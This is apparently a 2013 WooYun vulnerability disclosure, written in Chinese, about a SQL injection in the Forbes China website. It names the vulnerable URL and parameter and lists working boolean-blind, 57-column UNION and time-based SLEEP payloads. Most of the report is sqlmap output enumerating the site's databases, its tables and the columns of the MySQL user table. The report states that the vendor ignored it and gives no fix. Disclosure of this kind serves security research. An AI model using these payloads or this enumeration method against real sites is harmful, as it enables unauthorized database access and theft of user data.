漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-043280
漏洞标题:福布斯中文网SQL注入漏洞
相关厂商:福布斯中文网
漏洞作者: adm1n
提交时间:2013-11-19 10:45
修复时间:2014-01-03 10:45
公开时间:2014-01-03 10:45
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-11-19: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-01-03: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
福布斯中文网SQL注入漏洞,大量数据泄露
详细说明:
1.http://www.forbeschina.com/list/show_list.php?id=1909
漏洞证明:
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1909 AND 5900=5900
Type: UNION query
Title: MySQL UNION query (NULL) - 57 columns
Payload: id=-1532 UNION ALL SELECT NULL,CONCAT(0x71786b6171,0x4e734743417557
6c576e,0x71737a7a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1909 AND SLEEP(5)
---
[20:49:53] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0.11
[20:49:53] [INFO] fetching current user
[20:49:54] [WARNING] reflective value(s) found and filtering out
current user: 'forbes_db@%'
Database: forbes_email
[2 tables]
+-----------------------------------------+
| fb_email |
| fb_email_history |
+-----------------------------------------+
Database: activity
[6 tables]
+-----------------------------------------+
| act_family_info |
| act_family_info_rel |
| act_family_ip |
| act_family_list |
| act_family_user |
| test |
+-----------------------------------------+
Database: test
[15 tables]
+-----------------------------------------+
| user |
| admin_menu |
| db_migrate |
| facilities |
| facilities_category |
| food |
| hotline |
| hotline_category |
| region |
| rights |
| role |
| role_rights |
| service |
| service_category |
| user_log |
+-----------------------------------------+
Database: wordpress
[10 tables]
+-----------------------------------------+
| wp_commentmeta |
| wp_comments |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_terms |
| wp_users |
+-----------------------------------------+
Database: pachongdatabase
[3 tables]
+-----------------------------------------+
| thief_arc |
| thief_data |
| thief_preg |
+-----------------------------------------+
Database: information_schema
[28 tables]
+-----------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| KEY_COLUMN_USAGE |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+-----------------------------------------+
Database: forbes_survey
[123 tables]
+-----------------------------------------+
| ad_survey |
| iweibo2_base_config |
| iweibo2_base_nav |
| iweibo2_base_session |
| iweibo2_base_token |
| iweibo2_blackuser |
| iweibo2_component_banner |
| iweibo2_component_famous |
| iweibo2_component_famousp |
| iweibo2_component_famouspgroup |
| iweibo2_component_hottopic |
| iweibo2_component_management |
| iweibo2_component_recommend |
| iweibo2_mb_blog |
| iweibo2_mb_comment |
| iweibo2_mb_filter |
| iweibo2_mb_mask |
| iweibo2_mb_notice |
| iweibo2_mb_plugin |
| iweibo2_mb_report |
| iweibo2_mb_skin |
| iweibo2_mb_stat |
| iweibo2_mb_tag |
| iweibo2_mb_today_recommend |
| iweibo2_mb_topic |
| iweibo2_mb_topicblog |
| iweibo2_user_banned |
| iweibo2_user_event |
| iweibo2_user_event_join |
| iweibo2_user_follow |
| iweibo2_user_gdsession |
| iweibo2_user_group |
| iweibo2_user_member |
| iweibo2_user_tag |
| iweibo2_user_tiview |
| iweibo2_user_tiview_join |
| iweibo2_user_tiview_post |
| iweibo2_user_tlive |
| iweibo2_user_tlive_join |
| iweibo2_user_tlive_post |
| iweibo_base_config |
| iweibo_base_nav |
| iweibo_base_session |
| iweibo_base_token |
| iweibo_blackuser |
| iweibo_component_banner |
| iweibo_component_billionaire |
| iweibo_component_brand |
| iweibo_component_economist |
| iweibo_component_editorial |
| iweibo_component_entrepreneurs |
| iweibo_component_famous |
| iweibo_component_famousp |
| iweibo_component_famouspgroup |
| iweibo_component_hottopic |
| iweibo_component_investor |
| iweibo_component_management |
| iweibo_component_planner |
| iweibo_component_recommend |
| iweibo_mb_blog |
| iweibo_mb_comment |
| iweibo_mb_filter |
| iweibo_mb_mask |
| iweibo_mb_notice |
| iweibo_mb_plugin |
| iweibo_mb_report |
| iweibo_mb_skin |
| iweibo_mb_stat |
| iweibo_mb_tag |
| iweibo_mb_today_recommend |
| iweibo_mb_topic |
| iweibo_mb_topicblog |
| iweibo_user_banned |
| iweibo_user_event |
| iweibo_user_event_join |
| iweibo_user_follow |
| iweibo_user_gdsession |
| iweibo_user_group |
| iweibo_user_member |
| iweibo_user_tag |
| iweibo_user_tiview |
| iweibo_user_tiview_join |
| iweibo_user_tiview_post |
| iweibo_user_tlive |
| iweibo_user_tlive_join |
| iweibo_user_tlive_post |
| phpQAdmin |
| phpQAnswer |
| phpQQuestion |
| phpQSession |
| phpQSurvey |
| phpQUser |
| survey |
| uc_admins |
| uc_applications |
| uc_badwords |
| uc_domains |
| uc_failedlogins |
| uc_feeds |
| uc_friends |
| uc_mailqueue |
| uc_memberfields |
| uc_members |
| uc_mergemembers |
| uc_newpm |
| uc_notelist |
| uc_pm_indexes |
| uc_pm_lists |
| uc_pm_members |
| uc_pm_messages_0 |
| uc_pm_messages_2 |
| uc_pm_messages_3 |
| uc_pm_messages_4 |
| uc_pm_messages_5 |
| uc_pm_messages_6 |
| uc_pm_messages_7 |
| uc_pm_messages_8 |
| uc_pm_messages_9 |
| uc_protectedmembers |
| uc_settings |
| uc_sqlcache |
| uc_tags |
| uc_vars |
+-----------------------------------------+
Database: mysql
Table: user
[38 columns]
+----------------------+-----------------------------------+
| Column | Type |
+----------------------+-----------------------------------+
| User | char(16) |
| Alter_priv | enum('N','Y') |
| Alter_routine_priv | enum('N','Y') |
| Create_priv | enum('N','Y') |
| Create_routine_priv | enum('N','Y') |
| Create_user_priv | enum('N','Y') |
| Create_view_priv | enum('N','Y') |
| Delete_priv | enum('N','Y') |
| Drop_priv | enum('N','Y') |
| Event_priv | enum('N','Y') |
| Execute_priv | enum('N','Y') |
| File_priv | enum('N','Y') |
| Grant_priv | enum('N','Y') |
| Host | char(60) |
| Index_priv | enum('N','Y') |
| Insert_priv | enum('N','Y') |
| Lock_tables_priv | enum('N','Y') |
| max_connections | int(11) unsigned |
| max_questions | int(11) unsigned |
| max_updates | int(11) unsigned |
| max_user_connections | int(11) unsigned |
| Password | char(41) |
| Process_priv | enum('N','Y') |
| References_priv | enum('N','Y') |
| Reload_priv | enum('N','Y') |
| Repl_client_priv | enum('N','Y') |
| Repl_slave_priv | enum('N','Y') |
| Select_priv | enum('N','Y') |
| Show_db_priv | enum('N','Y') |
| Show_view_priv | enum('N','Y') |
| Shutdown_priv | enum('N','Y') |
| ssl_cipher | blob |
| ssl_type | enum('','ANY','X509','SPECIFIED') |
| Super_priv | enum('N','Y') |
| Trigger_priv | enum('N','Y') |
| Update_priv | enum('N','Y') |
| x509_issuer | blob |
| x509_subject | blob |
+----------------------+-----------------------------------+
修复方案:
版权声明:转载请注明来源 adm1n@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝